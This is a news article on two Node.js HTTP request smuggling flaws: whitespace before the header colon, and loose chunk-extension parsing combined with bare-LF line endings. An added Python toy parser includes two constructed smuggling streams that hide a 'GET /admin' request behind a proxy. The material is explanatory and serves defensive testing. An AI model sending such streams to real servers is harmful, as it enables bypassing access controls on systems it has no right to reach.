Bad line termination and incorrect parsing of chunk extensions exposed one of two HRS flaws
HTTP request smuggling (HRS) exploits disagreements between a front-end proxy and a back-end server about where one HTTP request ends and the next begins, so that bytes the front end treats as part of one request are processed by the back end as a separate request.
The vulnerabilities were discovered by Mattias Grenfeldt and Asta Olofsson as part of research for a bachelor’s thesis in computer science at the KTH Royal Institute of Technology in Sweden. This has since been rewritten as a conference paper and accepted for IEEE EDOC 2021.
“We set out to look for HTTP request smuggling vulnerabilities in six open source web servers and six open source proxies. Node was one of them, but initially we didn't find any issues in it,” Grenfeldt tells The Daily Swig.
“Some time later, while working on reporting the other issues found during the project, we just stumbled upon these two issues.”
‘Classic HRS technique’
The first, CVE-2021-22959, allows HTTP request smuggling due to whitespace in header names: the HTTP parser accepted requests with a space after the header name and before the colon. RFC 7230 (section 3.2.4) requires a server to reject such a request with a 400 response rather than interpret it.
“This is a classic HRS technique,” says Grenfeldt. “Node interprets ‘Content-Length : 5’ as ‘Content-Length: 5’. If combined with a proxy which ignores such headers, but forwards them unmodified, then HRS is possible. There have been many issues in the past similar to this.
“Interestingly, Regilero has also reported this exact issue to Node earlier, together with a bunch of other issues; they were collectively assigned CVE-2016-2086. All of the issues were fixed, except for the space + colon issue.”
Meanwhile, CVE-2021-22960 appears to represent a novel HRS technique, whereby combining bad line termination in one of the proxies investigated and incorrect parsing of chunk extensions in Node allows request smuggling.
Grenfeldt and Olofsson found that the vulnerable proxy looked for a single newline (LF) character to terminate the line containing the chunk size, but did not, as the chunked encoding requires (RFC 7230 specifies CRLF), check whether a carriage return preceded the LF.
“Right before this line termination is the place for the seldom used chunk extensions feature. In chunk extensions you can specify extra parameters, like ‘a=b’, after the chunk size. However, parsing for this is rarely implemented in systems and many instead just allow any bytes in this region,” explains Grenfeldt.
“These two problems combined enable us to construct a chunked body that the proxy interprets one way and Node interprets another way. We also found the same server behaviour in three other servers we investigated, making this the most severe problem we found.”
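To make both desyncs concrete, here is an added worked example (not code from the thesis, from Node.js, or from any of the proxies studied). It is a toy HTTP/1.1 stream parser with switchable leniencies: a PROXY profile that ignores a header with whitespace before the colon and ends the chunk-size line at a bare LF, a NODE_VULN profile that trims the whitespace (so “Content-Length : 32” is honoured) and accepts any bytes in a chunk extension up to the CR, and a NODE_FIXED profile that rejects both, which is what RFC 7230 requires and is assumed here as the safe behaviour rather than claimed to be Node's exact post-fix code. How the proxy handles the `;` in a size line and the terminator after chunk data is also an assumption. The two attacker streams, STREAM_A (space before the colon) and STREAM_B (chunk extension plus bare LF), are constructed for this example; each is seen as harmless by the proxy and as a hidden `GET /admin` by the vulnerable back end.

```python
"""Toy HTTP/1.1 stream parser modelling the two desyncs described above.
Profiles are assumptions built from the article's description, not real parser code."""
import re


class Incomplete(Exception):
    """The stream ended before the current message did (a real parser would keep reading)."""


PROXY      = dict(name_ws="ignore", bare_lf_ok=True,  loose_ext=False)
NODE_VULN  = dict(name_ws="trim",   bare_lf_ok=False, loose_ext=True)
NODE_FIXED = dict(name_ws="reject", bare_lf_ok=False, loose_ext=False)  # RFC 7230 behaviour


def parse_headers(raw, name_ws):
    """Return (method, target, headers, bytes consumed) for the message head at the start of raw."""
    end = raw.find(b"\r\n\r\n")
    if end < 0:
        raise Incomplete
    lines = raw[:end].split(b"\r\n")
    method, target, _version = lines[0].split(b" ", 2)   # ValueError on a malformed request line
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        if name != name.rstrip(b" \t"):          # "Content-Length : 32"; RFC 7230 s3.2.4 says MUST reject
            if name_ws == "reject":
                raise ValueError("whitespace before colon")
            if name_ws == "ignore":              # modelled proxy: unrecognised, but forwarded unmodified
                continue
            name = name.rstrip(b" \t")           # modelled Node: treated as Content-Length
        headers[name.lower()] = value.strip()
    return method, target, headers, end + 4


def expect_eol(raw, pos, bare_lf_ok):
    """Consume a line terminator: CRLF, or a bare LF when the profile tolerates it."""
    if raw[pos:pos + 2] == b"\r\n":
        return pos + 2
    if bare_lf_ok and raw[pos:pos + 1] == b"\n":
        return pos + 1
    if b"\r\n".startswith(raw[pos:pos + 2]):
        raise Incomplete
    raise ValueError("expected CRLF")


def read_chunked(raw, pos, bare_lf_ok, loose_ext):
    """Decode a chunked body starting at pos; return (body, end). Trailers are not modelled."""
    body = b""
    while True:
        if bare_lf_ok:                           # modelled proxy: the size line ends at the first LF
            nl = raw.find(b"\n", pos)
            if nl < 0:
                raise Incomplete
            size = int(raw[pos:nl].rstrip(b"\r").split(b";")[0], 16)
            pos = nl + 1
        else:                                    # modelled Node: hex size, optional ;extension, CRLF
            m = re.match(rb"[0-9a-fA-F]+", raw[pos:])
            if not m:
                if pos >= len(raw):
                    raise Incomplete
                raise ValueError("bad chunk size")
            size, pos = int(m.group(), 16), pos + m.end()
            if raw[pos:pos + 1] == b";":
                cr = raw.find(b"\r", pos)
                if cr < 0:
                    raise Incomplete
                ext = raw[pos:cr]                # vulnerable profile: any bytes up to the CR pass
                if not loose_ext and re.search(rb"[\x00-\x1f\x7f]", ext):
                    raise ValueError("control byte in chunk extension")
                pos = cr
            pos = expect_eol(raw, pos, bare_lf_ok)
        if size == 0:
            return body, expect_eol(raw, pos, bare_lf_ok)
        if len(raw) - pos < size:
            raise Incomplete
        body += raw[pos:pos + size]
        pos = expect_eol(raw, pos + size, bare_lf_ok)


def parse_stream(raw, prof):
    """Split raw into (method, target, body) messages; return (messages, leftover, error)."""
    messages, pos = [], 0
    while pos < len(raw):
        try:
            method, target, headers, hlen = parse_headers(raw[pos:], prof["name_ws"])
            if headers.get(b"transfer-encoding") == b"chunked":
                body, end = read_chunked(raw[pos:], hlen, prof["bare_lf_ok"], prof["loose_ext"])
            elif b"content-length" in headers:
                n = int(headers[b"content-length"])
                if len(raw) - pos - hlen < n:
                    raise Incomplete
                body, end = raw[pos + hlen:pos + hlen + n], hlen + n
            else:
                body, end = b"", hlen
        except Incomplete:
            return messages, raw[pos:], "incomplete"
        except ValueError as exc:
            return messages, raw[pos:], str(exc)
        messages.append((method, target, body))
        pos += end
    return messages, b"", ""


# Constructed attacker streams (not from the paper). Case 1: the 32-byte "body" Node reads is
# "GET /public HTTP/1.1\r\nX-Ignore: ", so the proxy sees GET /public while Node sees GET /admin.
STREAM_A = (b"POST / HTTP/1.1\r\nHost: example.test\r\nContent-Length : 32\r\n\r\n"
            b"GET /public HTTP/1.1\r\nX-Ignore: GET /admin HTTP/1.1\r\nHost: example.test\r\n\r\n")

# Case 2: one chunked POST for the proxy, a POST plus a second request for Node.
SMUGGLED = b"GET /admin HTTP/1.1\r\nHost: x\r\n\r\n"                  # 32 bytes
STREAM_B = (b"POST / HTTP/1.1\r\nHost: x\r\nTransfer-Encoding: chunked\r\n\r\n"
            b"6;\nxx\r\n"        # Node: size 6, extension "\nxx"; proxy: size line "6;" ends at the LF
            b"ab\r\n25"          # Node: its 6 data bytes; proxy: "xx\r\nab" was its data, "25" a new size line
            b"\r\n"              # Node: end of chunk; proxy: end of size line, 0x25 = 37 data bytes follow
            b"0\r\n\r\n"         # Node: last chunk, request complete; proxy: data bytes 1-5
            + SMUGGLED           # Node: a second request; proxy: data bytes 6-37
            + b"\r\n0\r\n\r\n")  # proxy: end of data, last chunk, request complete

if __name__ == "__main__":
    for label, stream in (("header space", STREAM_A), ("chunk extension", STREAM_B)):
        for name, prof in (("proxy", PROXY), ("node(vuln)", NODE_VULN), ("node(fixed)", NODE_FIXED)):
            msgs, rest, err = parse_stream(stream, prof)
            print(label, name, [(m.decode(), t.decode(), len(b)) for m, t, b in msgs], len(rest), err)
```

Running it shows the proxy logging `POST /` and `GET /public` (or a single chunked `POST /`) while the vulnerable back end logs `GET /admin`, and the fixed profile refusing the whole stream. The practical check this suggests for a proxy and back-end pair is to send exactly such streams through the front end and compare the two access logs; any header or chunk line one side cannot parse should cause a 400 and a closed connection, never silent forwarding.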
Grenfeldt and Olofsson reported the issues on June 19 and 20, with Node releasing a fix on October 12.